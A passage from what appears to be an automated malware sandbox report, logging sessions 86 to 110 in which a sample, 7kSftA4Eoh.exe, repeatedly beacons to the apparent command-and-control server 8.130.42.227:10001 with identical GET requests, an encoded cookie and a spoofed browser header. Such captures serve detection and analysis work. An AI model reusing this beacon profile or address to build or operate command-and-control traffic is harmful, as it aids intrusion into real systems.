                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:40.809396029 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:40 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                86 | 192.168.2.4 | 49823 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:40.973115921 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:41.920358896 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:41 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                87 | 192.168.2.4 | 49824 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:42.038556099 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:42.984538078 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:42 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                88 | 192.168.2.4 | 49825 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:43.109435081 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:44.063050032 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:43 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                89 | 192.168.2.4 | 49826 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:44.186863899 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:45.136379957 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:44 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                90 | 192.168.2.4 | 49827 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:45.249651909 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:46.218566895 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:46 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                91 | 192.168.2.4 | 49828 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:46.344548941 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:47.282550097 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:47 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                92 | 192.168.2.4 | 49829 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:47.408241987 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:48.371803045 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:48 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                93 | 192.168.2.4 | 49830 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:48.639575005 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:49.608248949 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:49 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                94 | 192.168.2.4 | 49831 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:49.718794107 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:50.703569889 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:50 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                95 | 192.168.2.4 | 49832 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:50.912420034 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:51.880003929 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:51 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                96 | 192.168.2.4 | 49833 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:51.999813080 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:53.537100077 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:53 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                97 | 192.168.2.4 | 49834 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:53.834593058 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:55.387809038 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:55 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                98 | 192.168.2.4 | 49835 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:55.513971090 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:56.475521088 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:56 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                99 | 192.168.2.4 | 49836 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:56.593599081 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:57.540667057 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:57 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                100 | 192.168.2.4 | 49837 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:57.656733036 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:58.615809917 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:58 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                101 | 192.168.2.4 | 49838 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:58.742556095 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:59.713992119 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:59 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                102 | 192.168.2.4 | 49839 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:59.848725080 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:00.832353115 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:00 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                103 | 192.168.2.4 | 49840 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:19:01.118943930 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:02.068789005 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:01 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                104 | 192.168.2.4 | 49841 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:19:02.204703093 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:03.153043985 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:02 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                105 | 192.168.2.4 | 49842 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:19:03.290126085 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:04.241883039 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:04 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                106 | 192.168.2.4 | 49843 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:19:04.541111946 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:05.506321907 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:05 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                107 | 192.168.2.4 | 49844 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:19:05.639437914 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:06.611948967 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:06 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                108 | 192.168.2.4 | 49845 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:19:06.769355059 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:07.713140011 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:07 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                109 | 192.168.2.4 | 49846 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:19:07.890803099 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:08.837522984 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:08 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                110 | 192.168.2.4 | 49847 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:19:08.967098951 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
